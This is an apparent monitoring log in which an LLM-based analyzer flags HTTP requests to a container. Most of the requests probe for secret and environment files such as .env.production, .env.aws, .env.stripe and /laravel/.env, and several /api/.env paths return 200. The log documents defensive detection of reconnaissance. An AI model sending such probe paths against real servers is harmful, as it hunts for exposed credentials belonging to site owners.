Mar 20 15:16:27 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:27.473806 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 15:16:27 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:27.473840 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Request for a hidden environment file (.env.production) on a public endpoint combined with a 404 response suggests probing for sensitive files. Line=2026-03-20T15:15:59.130961541Z GET /.env.production 404 0.609 ms - 9
Mar 20 15:16:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:31.151652 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.72 action=alert pattern_type=
Mar 20 15:16:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:31.151689 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Request to a sensitive file path /.env.production.local which is commonly probed in environment disclosure attempts; returned 404 but behavior warrants scrutiny. Line=2026-03-20T15:15:59.342317369Z GET /.env.production.local 404 0.747 ms - 9
Mar 20 15:16:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:31.938837 [observer] Pipeline: processed=7020 pattern_hits=6576 llm_calls=444 llm_errors=3 learned=5
Mar 20 15:16:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:31.938869 [observer] Patterns: hash=6562 prefix=14 regex=0 contains=0 deny=127 alert=843 suppress=0 misses=444
Mar 20 15:16:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:36.408126 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.72 action=alert pattern_type=
Mar 20 15:16:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:36.408184 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Access to a likely sensitive file (.env.prod) resulting in 404; indicative of probing for environment leakage or sensitive files. Line=2026-03-20T15:15:59.354217808Z GET /.env.prod 404 0.805 ms - 9
Mar 20 15:16:40 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:40.612420 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 15:16:40 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:40.612461 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Access attempt to a sensitive environment file (.env.staging) detected, which is commonly probed in scans. Line=2026-03-20T15:15:59.548371798Z GET /.env.staging 404 0.551 ms - 9
Mar 20 15:16:46 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:46.441275 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 15:16:46 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:46.441309 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Request to /.env.stage is a common probing pattern to check for exposure of sensitive environment files. Line=2026-03-20T15:15:59.559519892Z GET /.env.stage 404 0.553 ms - 9
Mar 20 15:16:52 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:52.055539 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.60 action=alert pattern_type=
Mar 20 15:16:52 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:52.055579 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Access to /admin returned 404, which can indicate probing for an admin interface. Line=2026-03-20T15:15:59.588438764Z GET /admin 404 0.588 ms - 9
Mar 20 15:16:55 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:55.682151 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.75 action=allow pattern_type=prefix
Mar 20 15:16:55 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:16:55.682213 [analyzer] Source hint mismatch: LLM says "nginx", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 15:17:00 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:17:00.227259 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.80 action=allow pattern_type=prefix
Mar 20 15:17:00 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:17:00.227297 [analyzer] Source hint mismatch: LLM says "docker", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 15:17:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:17:01.949994 [observer] Pipeline: processed=7030 pattern_hits=6580 llm_calls=450 llm_errors=3 learned=5
Mar 20 15:17:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:17:01.950025 [observer] Patterns: hash=6566 prefix=14 regex=0 contains=0 deny=127 alert=843 suppress=0 misses=450
Mar 20 15:17:06 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:17:06.494541 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 15:17:06 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:17:06.494574 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=HTTP 404 response with noticeable latency may indicate a broken link, probing, or misconfiguration; not definitively malicious but warrants monitoring. Line=2026-03-20T15:15:59.691694923Z GET /subscribe 404 0.587 ms - 9
Mar 20 15:17:09 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:17:09.131255 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.92 action=allow pattern_type=prefix
Mar 20 15:17:09 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:17:09.131291 [analyzer] Source hint mismatch: LLM says "docker", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 15:17:14 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:17:14.679966 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.72 action=alert pattern_type=
Mar 20 15:17:14 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:17:14.680040 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Access to a sensitive file path (.env.dev) commonly targeted in attacks or misconfig checks, returned 404 but indicates probing behavior. Line=2026-03-20T15:15:59.772105403Z GET /.env.dev 404 0.618 ms - 9
Mar 20 15:17:18 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:17:18.570463 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.66 action=alert pattern_type=
Mar 20 15:17:18 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:17:18.570498 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Request to a sensitive file (.env.development) returning 404 could indicate probing for misconfigurations; not definitive but warrants alert. Line=2026-03-20T15:15:59.780246317Z GET /.env.development 404 0.630 ms - 9
Mar 20 15:17:23 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:17:23.521052 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 15:17:23 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:17:23.521097 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Request to /.env.local could indicate probing for environment configuration files; 404 indicates not present but reconnaissance. Line=2026-03-20T15:15:59.797803407Z GET /.env.local 404 0.504 ms - 9
Mar 20 15:17:28 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:17:28.166489 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.80 action=allow pattern_type=prefix
Mar 20 15:17:28 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:17:28.166526 [analyzer] Source hint mismatch: LLM says "nginx_http_server", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 15:17:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:17:31.939859 [observer] Pipeline: processed=7038 pattern_hits=6582 llm_calls=456 llm_errors=3 learned=5
Mar 20 15:17:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:17:31.939887 [observer] Patterns: hash=6568 prefix=14 regex=0 contains=0 deny=127 alert=843 suppress=0 misses=456
Mar 20 15:17:34 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:17:34.227895 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.55 action=alert pattern_type=
Mar 20 15:17:34 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:17:34.227936 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Request to /.env.uat is a common probe for sensitive env file exposure; 404 indicates not found but pattern suggests automated scanning Line=2026-03-20T15:15:59.852780484Z GET /.env.uat 404 0.635 ms - 9
Mar 20 15:17:39 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:17:39.921224 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 15:17:39 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:17:39.921262 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Request to a sensitive file (.env) resulting in 404; indicates probing/scan activity rather than a normal access pattern. Line=2026-03-20T15:15:59.855626982Z GET /.env.test 404 0.540 ms - 9
Mar 20 15:17:46 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:17:46.426917 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 15:17:46 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:17:46.426955 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Request to access a sensitive file (.env) which is commonly probed by attackers; although it returned 404, it's unusual and warrants monitoring. Line=2026-03-20T15:15:59.956200653Z GET /.env.vite 404 0.649 ms - 9
Mar 20 15:17:51 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:17:51.577551 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.72 action=alert pattern_type=
Mar 20 15:17:51 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:17:51.577597 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Request to access a sensitive file (.env.bak) commonly probed in reconnaissance attempts; not confirmed malicious but warrants attention. Line=2026-03-20T15:16:00.061055036Z GET /.env.bak 404 0.894 ms - 9
Mar 20 15:17:57 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:17:57.186129 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 15:17:57 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:17:57.186176 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=HTTP GET to a sensitive path /.env.backup returning 404; attempts to access environment/config files are common reconnaissance patterns Line=2026-03-20T15:16:00.105926482Z GET /.env.backup 404 0.637 ms - 9
Mar 20 15:18:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:18:01.948880 [observer] Pipeline: processed=7046 pattern_hits=6585 llm_calls=461 llm_errors=3 learned=5
Mar 20 15:18:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:18:01.948913 [observer] Patterns: hash=6571 prefix=14 regex=0 contains=0 deny=127 alert=843 suppress=0 misses=461
Mar 20 15:18:03 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:18:03.651549 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 15:18:03 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:18:03.651591 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Access to a sensitive file path /.env.old resulting in 404; typical probe for sensitive files Line=2026-03-20T15:16:00.127731335Z GET /.env.old 404 5.354 ms - 9
Mar 20 15:18:09 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:18:09.946405 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 15:18:09 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:18:09.946440 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Access to a hidden file path (.env.save) returning 404 suggests a probe for sensitive files. Not definitive malicious activity, but warrants monitoring. Line=2026-03-20T15:16:00.286742062Z GET /.env.save 404 2.036 ms - 9
Mar 20 15:18:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:18:15.740339 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 15:18:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:18:15.740372 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Access to a sensitive path /.env.example returning 404 may indicate probing for secret files Line=2026-03-20T15:16:00.292680803Z GET /.env.example 404 1.779 ms - 9
Mar 20 15:18:19 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:18:19.359427 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.65 action=allow pattern_type=prefix
Mar 20 15:18:19 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:18:19.359468 [analyzer] Source hint mismatch: LLM says "nginx", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 15:18:23 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:18:23.251873 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.85 action=allow pattern_type=prefix
Mar 20 15:18:23 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:18:23.251909 [analyzer] Source hint mismatch: LLM says "docker", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 15:18:28 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:18:28.023745 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 20 15:18:28 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:18:28.023784 [analyzer] Source hint mismatch: LLM says "nginx", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 15:18:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:18:31.942360 [observer] Pipeline: processed=7055 pattern_hits=6588 llm_calls=467 llm_errors=3 learned=5
Mar 20 15:18:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:18:31.942392 [observer] Patterns: hash=6574 prefix=14 regex=0 contains=0 deny=127 alert=843 suppress=0 misses=467
Mar 20 15:18:32 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:18:32.823719 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.62 action=allow pattern_type=prefix
Mar 20 15:18:32 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:18:32.823762 [analyzer] Source hint mismatch: LLM says "nginx", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 15:18:37 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:18:37.774344 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 20 15:18:37 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:18:37.774385 [analyzer] Source hint mismatch: LLM says "nginx", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 15:18:43 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:18:43.280326 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.75 action=allow pattern_type=prefix
Mar 20 15:18:43 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:18:43.280365 [analyzer] Source hint mismatch: LLM says "nginx", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 15:18:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:18:47.900709 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.66 action=alert pattern_type=
Mar 20 15:18:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:18:47.900743 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Access attempt to a sensitive file path (.env.dist) detected (likely directory traversal probe). Not definitive malicious activity, but warrants alerting. Line=2026-03-20T15:16:00.588647768Z GET /.env.dist 404 0.576 ms - 9
Mar 20 15:18:53 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:18:53.064630 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.60 action=alert pattern_type=
Mar 20 15:18:53 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:18:53.064666 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=HTTP 404 on /payment could be normal but may indicate probing or misconfiguration; not clearly malicious but warrants attention. Line=2026-03-20T15:16:00.595972403Z GET /payment 404 0.604 ms - 9
Mar 20 15:18:57 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:18:57.760202 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 15:18:57 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:18:57.760237 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Request to a sensitive file (.env.template) returning 404 suggests probing for secrets exposure. Line=2026-03-20T15:16:00.643534214Z GET /.env.template 404 0.570 ms - 9
Mar 20 15:19:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:19:01.727113 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.60 action=alert pattern_type=
Mar 20 15:19:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:19:01.727336 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Access to a dot-env file path (/env.txt/.env.txt) is commonly probed by attackers to discover sensitive configuration data; the request returned 404 but indicates potential reconnaissance activity. Line=2026-03-20T15:16:00.698301682Z GET /.env.txt 404 0.654 ms - 9
Mar 20 15:19:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:19:01.963227 [observer] Pipeline: processed=7066 pattern_hits=6592 llm_calls=474 llm_errors=3 learned=5
Mar 20 15:19:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:19:01.963252 [observer] Patterns: hash=6578 prefix=14 regex=0 contains=0 deny=127 alert=843 suppress=0 misses=474
Mar 20 15:19:06 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:19:06.286023 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.68 action=alert pattern_type=
Mar 20 15:19:06 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:19:06.286070 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Access attempt to a sensitive dotfile (.env.json) which is commonly targeted in reconnaissance probes. Although the status is 404, repeated requests to such files can indicate probing for secrets. Line=2026-03-20T15:16:00.742959523Z GET /.env.json 404 0.620 ms - 9
Mar 20 15:19:10 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:19:10.789777 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.60 action=alert pattern_type=
Mar 20 15:19:10 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:19:10.789826 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Request for a sensitive file path /.env.aws returning 404 suggests probing for environment configuration files Line=2026-03-20T15:16:00.757265078Z GET /.env.aws 404 0.593 ms - 9
Mar 20 15:19:14 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:19:14.892431 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 15:19:14 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:19:14.892466 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Access to dot-env file path / .env.stripe returning 404 suggests probing for sensitive files; not confirmed malicious but warrants attention. Line=2026-03-20T15:16:00.762119434Z GET /.env.stripe 404 0.597 ms - 9
Mar 20 15:19:18 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:19:18.850770 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.75 action=alert pattern_type=
Mar 20 15:19:18 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:19:18.850803 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Access attempt to a sensitive file (.env_sample) via HTTP GET, which is a common probe for sensitive config exposure. Line=2026-03-20T15:16:00.814498836Z GET /.env_sample 404 0.853 ms - 9
Mar 20 15:19:23 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:19:23.411680 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.65 action=allow pattern_type=prefix
Mar 20 15:19:23 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:19:23.411717 [analyzer] Source hint mismatch: LLM says "nginx or reverse-proxy web server", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 15:19:29 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:19:29.312352 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 15:19:29 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:19:29.312387 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Access to /env.backup path with 404 may indicate probing for sensitive environment backup file Line=2026-03-20T15:16:01.008215076Z GET /env.backup 404 0.644 ms - 9
Mar 20 15:19:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:19:31.942146 [observer] Pipeline: processed=7076 pattern_hits=6596 llm_calls=480 llm_errors=3 learned=5
Mar 20 15:19:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:19:31.942201 [observer] Patterns: hash=6582 prefix=14 regex=0 contains=0 deny=127 alert=843 suppress=0 misses=480
Mar 20 15:19:34 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:19:34.735042 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.60 action=alert pattern_type=
Mar 20 15:19:34 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:19:34.735089 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Access to a sensitive file path (.env) via API endpoint is unusual and may indicate probing for secrets. Line=2026-03-20T15:16:01.028473696Z GET /api/.env 200 1.419 ms - 83
Mar 20 15:19:40 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:19:40.054295 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.60 action=allow pattern_type=prefix
Mar 20 15:19:40 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:19:40.054335 [analyzer] Source hint mismatch: LLM says "http_server", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 15:19:44 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:19:44.902288 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.68 action=alert pattern_type=
Mar 20 15:19:44 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:19:44.902323 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Access to /api/v1/.env is often targeted to discover sensitive environment configuration; while it may be a legitimate test, it is commonly associated with probing attempts. Line=2026-03-20T15:16:01.160854919Z GET /api/v1/.env 200 0.503 ms - 83
Mar 20 15:19:51 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:19:51.901233 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 15:19:51 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:19:51.901356 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Access to a .env path is commonly probed for sensitive configuration; though a 404, it indicates potential discovery attempts. Line=2026-03-20T15:16:01.227352362Z GET /api/v2/.env 404 0.808 ms - 9
Mar 20 15:19:57 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:19:57.000510 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.75 action=allow pattern_type=prefix
Mar 20 15:19:57 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:19:57.000546 [analyzer] Source hint mismatch: LLM says "nginx", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 15:20:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:20:01.453923 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 15:20:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:20:01.454013 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Access to a .env file via HTTP is potentially exposing sensitive configuration; 200 OK indicates the file was served, warranting alert Line=2026-03-20T15:16:01.317731792Z GET /api/shared/.env 200 0.586 ms - 83
Mar 20 15:20:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:20:01.969715 [observer] Pipeline: processed=7084 pattern_hits=6598 llm_calls=486 llm_errors=3 learned=5
Mar 20 15:20:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:20:01.969746 [observer] Patterns: hash=6584 prefix=14 regex=0 contains=0 deny=127 alert=843 suppress=0 misses=486
Mar 20 15:20:06 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:20:06.666419 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 15:20:06 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:20:06.666458 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Access to the server's .env file via an API endpoint is unusual and could indicate probing for sensitive configuration. Line=2026-03-20T15:16:01.331708842Z GET /api/shared/config/.env 200 0.535 ms - 83
Mar 20 15:20:11 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:20:11.763088 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 15:20:11 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:20:11.763138 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Request to a sensitive file (.env) on the backend and a non-success status (404) suggests probing or misconfiguration attempts. Line=2026-03-20T15:16:01.405029425Z GET /backend/.env 404 0.663 ms - 9
Mar 20 15:20:14 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:20:14.672000 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 15:20:14 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:20:14.672043 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Access to the Laravel .env file is a common probe for sensitive configuration exposure. Line=2026-03-20T15:16:01.406526348Z GET /laravel/.env 404 0.533 ms - 9
Mar 20 15:20:18 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:20:18.689897 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.72 action=alert pattern_type=
